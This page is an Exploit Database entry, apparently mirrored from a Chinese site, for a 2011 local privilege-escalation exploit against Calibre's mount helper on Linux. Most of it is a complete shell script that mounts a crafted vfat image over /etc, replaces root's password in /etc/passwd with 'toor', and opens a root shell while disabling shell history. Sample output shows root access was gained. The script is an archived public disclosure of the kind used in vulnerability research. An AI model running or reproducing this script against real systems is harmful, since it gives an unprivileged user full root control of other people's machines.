Calibre E-Book Reader – Local Privilege Escalation (2)

• Exploit Database
• 29 阅读

• 作者： zx2c4
  日期： 2011-11-03
• 类别：

  • local
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/18071/

• # Exploit Title: .60-Calibrer Assault Mount: Another Calibre E-Book Reader Local Root
  # Date: Nov 2, 2011
  # Author: zx2c4
  # Software Link: http://calibre-ebook.com/
  # Tested on: Gentoo
  # Platform: Linux
  # Category: Local
  # CVE: pending
  #!/bin/sh
  
  #######################################
  # .60-Calibrer Assault Mount#
  #by zx2c4 #
  #######################################
  
  ################################################################################
  # Yesterday we learned how Calibre's usage of execlp allowed us to override PATH
  # and get root, in my ".50-Calibrer Assault Mount" exploit. Today we exploit a
  # more fundumental issue with Calibre's mount helper -- namely, that it allows
  # us to mount a vfat filesystem anywhere we want. By mounting a file system
  # image over /etc, we are able to tinker /etc/passwd and make the root password
  # temporarily "toor".
  #
  # - zx2c4
  # 2011-11-2
  #
  # Usage:
  # $ ./60calibrerassaultmount.sh 
  # [+] Making temporary directory: /tmp/tmp.OGgS0jaoD4
  # [+] Making overlay image:
  # 51200+0 records in
  # 51200+0 records out
  # 26214400 bytes (26 MB) copied, 0.100984 s, 260 MB/s
  # mkfs.vfat 3.0.11 (24 Dec 2010)
  # [+] Mounting overlay image using calibre-mount-helper.
  # [+] Copying /etc into overlay.
  # [+] Tampering with overlay's passwd.
  # [+] Unmounting overlay image using calibre-mount-helper.
  # [+] Mounting overlay to /etc using calibre-mount-helper.
  # [+] Asking for root. When prompted for a password, enter 'toor'.
  # Password: [typed in toor to the terminal] 
  # [+] Unmounting /etc using root umount.
  # [+] Cleaning up: /tmp/tmp.OGgS0jaoD4
  # [+] Getting shell.
  # sh-4.2# id
  # uid=0(root) gid=0(root) groups=0(root)
  # sh-4.2# whoami
  # root
  # sh-4.2# 
  ################################################################################
  
  
  echo "#######################################"
  echo "# .60-Calibrer Assault Mount#"
  echo "#by zx2c4 #"
  echo "#######################################"
  echo
  echo -n "[+] Making temporary directory: "
  dir="$(mktemp -d)"
  echo "$dir"
  cd "$dir"
  echo "[+] Making overlay image:"
  dd if=/dev/zero of=overlay count=51200
  /usr/sbin/mkfs.vfat overlay
  echo "[+] Mounting overlay image using calibre-mount-helper."
  mkdir staging
  calibre-mount-helper mount overlay staging
  echo "[+] Copying /etc into overlay."
  cd staging/
  cp -a /etc/* . 2>/dev/null
  echo "[+] Tampering with overlay's passwd."
  cat passwd | tail -n +2 > tmp
  echo "root:$(echo -n 'toor' | openssl passwd -1 -stdin):0:0:root:/root:/bin/bash" >> tmp
  mv tmp passwd
  echo "[+] Unmounting overlay image using calibre-mount-helper."
  cd ..
  calibre-mount-helper eject overlay staging >/dev/null 2>&1
  echo "[+] Mounting overlay to /etc using calibre-mount-helper."
  calibre-mount-helper mount overlay /etc>/dev/null 2>&1
  cd /
  echo "[+] Asking for root. When prompted for a password, enter 'toor'."
  su -c "echo \"[+] Unmounting /etc using root umount.\"; umount /etc; echo \"[+] Cleaning up: $dir\"; rm -rf \"$dir\"; echo \"[+] Getting shell.\"; HISTFILE=\"/dev/null\" exec /bin/sh"